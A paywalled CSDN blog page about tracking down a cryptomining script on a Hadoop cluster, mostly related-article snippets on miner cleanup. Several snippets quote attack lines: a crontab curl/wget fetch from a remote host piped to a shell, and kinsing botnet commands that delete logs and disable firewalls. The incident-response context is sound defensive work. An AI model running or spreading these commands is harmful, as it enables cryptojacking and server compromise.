集群挖矿脚本排查日记

最新推荐文章于 2024-04-12 17:36:40 发布
VIP文章 最新推荐文章于 2024-04-12 17:36:40 发布
阅读量1.1k 收藏
点赞数
分类专栏: 原创 文章标签: 矿机脚本 集群 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43833791/article/details/85610359
版权

集群挖矿脚本排查日记

1、事件描述

集群挖矿脚本,这种事情遇到过好几次了,以前的基本上都是通过yarn的8088端口进来的,然后运行很多的application直接撑爆你的cpu,这种只需要关掉8088的外网访问端口基本就能解决。但是这一次遇到一个非常恶心的挖矿脚本,废fa不多说,先上脚本(如图):
在这里插入图片描述
在这里插入图片描述
大家可以看到这个脚本是有多恶心

最低0.47元/天 解锁文章
tandz_t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java 挖矿代码,挖矿运行脚本注解(示例代码)
weixin_33413018的博客
03-20 1463
#!/bin/bash#杀掉旧 trace 挖苦程序if pgrep trace; then pkill trace; fi# CPU 数: 8threadCount=$(lscpu | grep ‘CPU(s)‘ | grep -v ‘,‘ | awk ‘{print $2}‘ | head -n 1);#主机名 md5 校验码: b8419160hostHash=$(hostname -f |...
一键查杀linux挖矿脚本,这几个linux命令或许帮您查杀挖矿病毒
weixin_36307344的博客
04-30 3425
最近受类似于比特币及区块链技术的影响,有些云服务器被攻入,植入挖矿病毒,利用你的云服务器来挖矿。本文就阐述几个常用的linux命令,假如你碰到这样的病毒,这些linux命令可能会有些帮助。这些命令并不完全是删除挖矿病毒的一种方面,它们更多的是一种通用的解决问题的方法,不单单局限于挖矿病毒。解决方法本文以这个挖矿进程来举例3798 root 20 0 386m 7852 1272 S...
如何检查并清除挖矿程序
haodoubi的博客
02-19 7550
1.检查cpu使用率 根据cpu使用率曲线确定2.11日可能被注入挖矿程序,根据top确定挖矿程序进程kdevtmpfsi 2.确定挖矿进程源程序位置 find / -name kdevtmpfsi ll 查看安装时间,对比cpu突然拔升时间 3.检查psadm2用户的合法性 4.检查root或者psadm2用户下是否有定时挖矿的复制文件任务 crontab -l crontab -r 删除定时任务 5.杀死挖矿进程 pkill kdevtmpfsi 6.删...
kinsing挖矿僵尸网络初始化脚本-注释版
makaisghr的专栏
06-01 1388
#!/bin/sh #Linux ulimit命令用于控制shell程序的资源。连接数设置为最大 ulimit -n 65535 #删除系统日志 rm -rf /var/log/syslog #关闭 /tmp /var/tmp 目录不可更改属性 chattr -iua /tmp/ chattr -iua /var/tmp/ #关闭防火墙 UFW,全称 Uncomplicated Firewall,是通过 iptables 实现的防火墙工具 ufw disable #清空iptables iptables
【应急响应】挖矿脚本检测指南&威胁情报&样本定性&文件清除&入口修复
今天是几号的博客
04-25 1668
某公司运维人员小李近期发现,通过搜索引擎访问该公司网站会自动跳转到恶意网站(博彩网站),但是直接输入域名访问该公司网站,则不会出现跳转问题,而且服务器CPU的使用率异常高,运维人员认为该公司服务器可能被黑客入侵了,现小李向XX安全公司求助,解决网站跳转问题。某天客户反馈:服务器疑似被入侵,风扇噪声很大,实验室因耗电量太大经常跳闸,服务器疑似被挖矿挖矿程序定位定性,时间分析,排查安全漏洞,攻击IP找到等。3、删除市场上已知挖矿脚本(恶意竞争了,属于是)危害:CPU拉满,网络阻塞,服务器卡顿、耗电等。
集群分发脚本xsync的编写与介绍
01-09
Hadoop–入门编写集群分发脚本xsync1.rcp命令2.scp命令3.rsync 远程同步工具4.xsync集群分发脚本1.创建文件2.编写代码3.修改脚本 xsync 具有执行权限4.调用脚本形式:xsync 文件名称 编写集群分发脚本xsync 在配置...
zookeeper集群搭建脚本
11-22
此附件是快速搭建zookeeper集群脚本,方便灵活,减少了自己一大堆复杂的操作,像运行服务一样执行几条start,stop等命令即可轻松完成集群搭建。
redis集群创建脚本.sh
11-22
此附件是快速搭建redis集群脚本,方便灵活,减少了自己一大堆复杂的操作,像运行服务一样执行几条start,stop等命令即可轻松完成集群搭建。
傻瓜式Hadoop集群配置脚本
05-19
利用shell脚本 对Hadoop环境进行傻瓜式配置 先解压! 环节包括: 1.修改hostname 2.修改hosts 3.配置免密 4.Hadoop配置文件的更改 !!!!!!!!!!!!!!!!!!!! ps 请特别注意以下几个问题: 1....
redis集群windows启动脚本
06-18
一键启动redis集群
进程检查查杀C+代码
03-15
可以检查关闭自己的进程,对于顽固性进程可以清楚,里面把权限提高至DEBUG
D盾网站源码后门木马检测工具
11-07
D盾网站源码后门木马检测工具
挖矿一键脚本_猫池挖矿事件分析
weixin_39588445的博客
12-12 2044
一、背景近期发现一起Weblogic wls-wsat反序列化漏洞利用攻击事件,利用该漏洞执行powershell系统命令,伪装矿池地址,不易被发现,静默下载猫池(c3pool.com)挖矿脚本,并执行脚本下载XMR挖矿程序并进行挖矿。猫池会在多种算法的N个币中,选择利润最高的币去挖,因此猫池收益高于只挖一个币的传统矿池。智能模块会根据某个币的交易所价格,交易所深度,挖矿难度(全网算力)...
linux低级挖矿病毒的查找定位
weixin_43269461的博客
06-17 952
现象 挖矿病毒的特点之一就是会表现出CPU负载接近饱和,因此先用free -m指令查看CPU的负荷情况。 定位 使用ps -aux | head -1;ps -aux |grep -v "USER" | sort -nr -k 3 | head 命令解析:查看CPU占用百分比前十的进程。head -1显示第一行,grep -v取反,sort -nr按照数字降序排列,sort -k 3按照第三列排列,head后面不加数字表示默认显示10行。 在kill掉异常进程之后可能会发现过一段时间或者重启后异常线程重新
【解决】ECS测试集群遭遇挖矿程序攻击
Moody的博客
09-09 405
[root@hadoop1 sbin]# crontab -l */10 * * * * (curl -fsSL --retry 3 -m180 "http://dl.djangocc.com:8080/p?a=p&a2=cron"||wget -q --tries=3 -T180 -O- "http://dl.djangocc.com:8080/p?a=p&a2=cron")|s...
凶残的挖矿脚本,奴役我数千机器!
热门推荐
weixin_39787242的博客
08-09 1万+
本文转载自不正经程序员 温馨提示:本文中出现的命令和脚本,不要在自家服务器上随便运行,除非你知道自己在做什么。 挖矿是把机器当作奴隶,一刻不停歇的去计算、运转,本质上是个无用的工作。但可惜的是,它能赚钱。用别人的机器去赚钱,更是很多人梦寐以求的,所以挖矿脚本屡禁不止。 有钱的地方,就有技术。但反过来并不一定成立。 牢记这个准则,就能够心平气和的学习新技术,而不是气急败坏的纠结为啥没钱。 1. 脚本从哪来? 下面是一个http的报文。 GET /console/images/%2E%2E%2F
清除 挖矿脚本 攻击
xzlAwin的博客
04-24 3502
清除 挖矿脚本 攻击 1.查看系统进程,是否有异常: top 发现CPU占用率200%,判定服务器已经被植入木马 2.查看异常进程是哪一个程序造成的 ls -al /proc/14618 发现恶意程序(绿色的是可执行文件)/etc/lafy 3.删除恶意程序 cd /etc rm -rf lzfy 4.发现过了一会,lzfy恶意程序再次出现,怀疑是个定时任务 查看定时任...
记一次CDH集群被下矿机
张老湿的博客
05-04 2927
今天一上线看到集群cpu跑到100%,心里也是一跳,该不会是被下矿机了吧 top一下,果不其然有个占进程占了大部分的cpu PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 23429 yarn 20 0 4121432 985.4m 39116 S 1226.7 1.5 ...
ELK日志分析系统之Zookeeper
最新发布
AH99999的博客
04-12 920
分布式应用可以基于它实现更高级的服务,实现诸如同步服务、配置维护和集群管理或者命名的服务。Zookeeper服务自身组成一个集群,2n+1个(奇数)服务允许n个失效,集群内一半以上机器可用,Zookeeper就可用。假设 3台机器组成的集群,可以有允许一台失效,如果有2台失效,这个集群就不可用,1
zookeeper集群启动脚本
08-16
以下是一个zookeeper集群启动脚本的示例: #!/bin/bash case $1 in "start"){ for i in hadoop102 hadoop103 hadoop104 do echo ---------- 启动 zookeeper 服务 on $i ------------ ssh $i "/opt/module/zookeeper-3.5.7/bin/zkServer.sh start" done };; "stop"){ for i in hadoop102 hadoop103 hadoop104 do echo ---------- 停止 zookeeper 服务 on $i ------------ ssh $i "/opt/module/zookeeper-3.5.7/bin/zkServer.sh stop" done };; "status"){ for i in hadoop102 hadoop103 hadoop104 do echo ---------- 查看 zookeeper 服务状态 on $i ------------ ssh $i "/opt/module/zookeeper-3.5.7/bin/zkServer.sh status" done };; esac 这个脚本可以通过执行不同的命令参数来启动、停止和查看zookeeper集群的状态。对于每个服务器,脚本会通过SSH连接执行相应的命令。你可以根据自己的集群配置和实际需求修改脚本中的服务器列表和路径。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [创建一个启动/关闭Zookeeper集群脚本](https://blog.csdn.net/BIPT919/article/details/124702356)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [Zookeeper - 集群搭建 + 群起集群脚本](https://blog.csdn.net/Trollz/article/details/126657569)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值